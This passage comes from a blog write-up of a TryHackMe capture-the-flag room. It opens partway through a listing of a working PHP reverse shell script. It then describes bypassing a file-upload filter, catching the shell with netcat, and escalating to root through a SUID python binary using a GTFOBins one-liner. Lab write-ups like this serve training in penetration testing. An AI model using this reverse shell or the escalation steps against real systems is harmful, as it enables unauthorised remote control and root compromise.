</span></span><span class="line"><span class="cl">	<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;$errstr ($errno)&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Spawn</span> <span class="n">shell</span> <span class="n">process</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">descriptorspec</span> <span class="o">=</span> <span class="n">array</span><span class="p">(</span>
</span></span><span class="line"><span class="cl">   <span class="mi">0</span> <span class="o">=&gt;</span> <span class="n">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;r&#34;</span><span class="p">),</span>  <span class="o">//</span> <span class="n">stdin</span> <span class="n">is</span> <span class="n">a</span> <span class="n">pipe</span> <span class="n">that</span> <span class="n">the</span> <span class="n">child</span> <span class="n">will</span> <span class="n">read</span> <span class="n">from</span>
</span></span><span class="line"><span class="cl">   <span class="mi">1</span> <span class="o">=&gt;</span> <span class="n">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">),</span>  <span class="o">//</span> <span class="n">stdout</span> <span class="n">is</span> <span class="n">a</span> <span class="n">pipe</span> <span class="n">that</span> <span class="n">the</span> <span class="n">child</span> <span class="n">will</span> <span class="n">write</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl">   <span class="mi">2</span> <span class="o">=&gt;</span> <span class="n">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">)</span>   <span class="o">//</span> <span class="n">stderr</span> <span class="n">is</span> <span class="n">a</span> <span class="n">pipe</span> <span class="n">that</span> <span class="n">the</span> <span class="n">child</span> <span class="n">will</span> <span class="n">write</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl"><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">process</span> <span class="o">=</span> <span class="n">proc_open</span><span class="p">(</span><span class="o">$</span><span class="n">shell</span><span class="p">,</span> <span class="o">$</span><span class="n">descriptorspec</span><span class="p">,</span> <span class="o">$</span><span class="n">pipes</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">is_resource</span><span class="p">(</span><span class="o">$</span><span class="n">process</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Can&#39;t spawn shell&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Set</span> <span class="n">everything</span> <span class="n">to</span> <span class="n">non</span><span class="o">-</span><span class="n">blocking</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Reason</span><span class="p">:</span> <span class="n">Occsionally</span> <span class="n">reads</span> <span class="n">will</span> <span class="n">block</span><span class="p">,</span> <span class="n">even</span> <span class="n">though</span> <span class="n">stream_select</span> <span class="n">tells</span> <span class="n">us</span> <span class="n">they</span> <span class="n">won</span><span class="s1">&#39;t</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">printit</span><span class="p">(</span><span class="s2">&#34;Successfully opened reverse shell to $ip:$port&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Check</span> <span class="k">for</span> <span class="n">end</span> <span class="n">of</span> <span class="n">TCP</span> <span class="n">connection</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">feof</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Shell connection terminated&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Check</span> <span class="k">for</span> <span class="n">end</span> <span class="n">of</span> <span class="n">STDOUT</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">feof</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Shell process terminated&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Wait</span> <span class="n">until</span> <span class="n">a</span> <span class="n">command</span> <span class="n">is</span> <span class="n">end</span> <span class="n">down</span> <span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="ow">or</span> <span class="n">some</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">command</span> <span class="n">output</span> <span class="n">is</span> <span class="n">available</span> <span class="n">on</span> <span class="n">STDOUT</span> <span class="ow">or</span> <span class="n">STDERR</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">read_a</span> <span class="o">=</span> <span class="n">array</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">num_changed_sockets</span> <span class="o">=</span> <span class="n">stream_select</span><span class="p">(</span><span class="o">$</span><span class="n">read_a</span><span class="p">,</span> <span class="o">$</span><span class="n">write_a</span><span class="p">,</span> <span class="o">$</span><span class="n">error_a</span><span class="p">,</span> <span class="n">null</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">If</span> <span class="n">we</span> <span class="n">can</span> <span class="n">read</span> <span class="n">from</span> <span class="n">the</span> <span class="n">TCP</span> <span class="n">socket</span><span class="p">,</span> <span class="n">send</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">data</span> <span class="n">to</span> <span class="n">process</span><span class="s1">&#39;s STDIN</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">in_array</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">read_a</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;SOCK READ&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">input</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">chunk_size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;SOCK: $input&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">fwrite</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">$</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">If</span> <span class="n">we</span> <span class="n">can</span> <span class="n">read</span> <span class="n">from</span> <span class="n">the</span> <span class="n">process</span><span class="s1">&#39;s STDOUT</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">send</span> <span class="n">data</span> <span class="n">down</span> <span class="n">tcp</span> <span class="n">connection</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">in_array</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">$</span><span class="n">read_a</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDOUT READ&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">input</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">$</span><span class="n">chunk_size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDOUT: $input&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">fwrite</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">If</span> <span class="n">we</span> <span class="n">can</span> <span class="n">read</span> <span class="n">from</span> <span class="n">the</span> <span class="n">process</span><span class="s1">&#39;s STDERR</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">send</span> <span class="n">data</span> <span class="n">down</span> <span class="n">tcp</span> <span class="n">connection</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">in_array</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">$</span><span class="n">read_a</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDERR READ&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">input</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">$</span><span class="n">chunk_size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDERR: $input&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">fwrite</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="n">proc_close</span><span class="p">(</span><span class="o">$</span><span class="n">process</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Like</span> <span class="nb">print</span><span class="p">,</span> <span class="n">but</span> <span class="n">does</span> <span class="n">nothing</span> <span class="k">if</span> <span class="n">we</span><span class="s1">&#39;ve daemonised ourself</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="p">(</span><span class="n">I</span> <span class="n">can</span><span class="s1">&#39;t figure out how to redirect STDOUT like a proper daemon)</span>
</span></span><span class="line"><span class="cl"><span class="n">function</span> <span class="n">printit</span> <span class="p">(</span><span class="o">$</span><span class="n">string</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!$</span><span class="n">daemon</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="nb">print</span> <span class="s2">&#34;$string</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="err">?</span><span class="o">&gt;</span> 
</span></span></code></pre></div><p>Try uploading that and you get the first hurdle of the room. It&rsquo;s not allowed.</p>
<figure><img src="/images/Posts/011/phperror.jpg"/>
</figure>

<p>This is where I got stuck for a little bit. I clicked the hint on the room question and told me to Search for &ldquo;file upload bypass&rdquo; and &ldquo;PHP reverse shell&rdquo;. Alright, I came across this <a href="https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html">website</a>, and there are multiple ways to rename it and execute PHP. After many renames I finally got one to upload successfully.</p>
<p>Set up your netcat listener <code>nc -nvlp 10.13.13.198</code> and click the file after navigating to the websites uploads directory. Successful reverse shell and whoami, well www-data naturally. You didn&rsquo;t think that was it did you. Well I was hoping too.</p>
<p>Now lets get a stable shell <code>/usr/bin/script -qc /bin/bash /dev/null</code>. You know the first thing to check for is the flags, so I <code>ls ~</code> to find the user flag. Claim your prize and let&rsquo;s find out how to get the root flag, shall we.</p>
<p>The room guides you to find SUID permissions. Setting UID binaries will allow you to elevate to root. Let&rsquo;s look for them by using <code>find / -user root -perm /4000</code>. After eliminating all the mountain of permission denied, you will find that <code>/usr/bin/python</code> is an eligible target. Off to <a href="https://gtfobins.github.io/gtfobins/python/#suid">GTFO Bins</a> I go. Let&rsquo;s press the I believe button and run the python code in there <code>python -c 'import os; os.execl(&quot;/bin/sh&quot;, &quot;sh&quot;, &quot;-p&quot;)'</code>. Success!! Go get that root flag and feel that accomplishment.</p>


  <h3>Related Posts</h3>
  <ul>
    
      <li><a href="/post/thm-lazy-admin/">THM Lazy Admin</a></li>
    
      <li><a href="/post/thm-pickle-rick/">THM Pickle Rick</a></li>
    
      <li><a href="/post/cyber-apocalypse_kryptos/">Cyber Apocalypse 2022 - Kryptos Support</a></li>
    
  </ul>

</div>
    <div class="post__footer">
      
        <span><a class="category" href="/categories/ethical-hacking/">Ethical Hacking</a><a class="category" href="/categories/ctf/">CTF</a><a class="category" href="/categories/tryhackme/">TryHackMe</a><a class="category" href="/categories/linux/">Linux</a><a class="category" href="/categories/pentesting/">Pentesting</a></span>


      

      
        <span><a class="tag" href="/tags/thm/">THM</a><a class="tag" href="/tags/ctf/">CTF</a><a class="tag" href="/tags/php/">PHP</a></span>


      
    </div>

    
  </div>

      </main>
    </div><footer class="footer footer__base">
  <ul class="footer__list">
    <li class="footer__item">
      &copy;
      
        2020-2025
      
    </li>
    
  </ul>
</footer>
  
  <script
    type="text/javascript"
    src="/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js"
    integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ="
    crossorigin="anonymous"
  ></script></body>
</html>
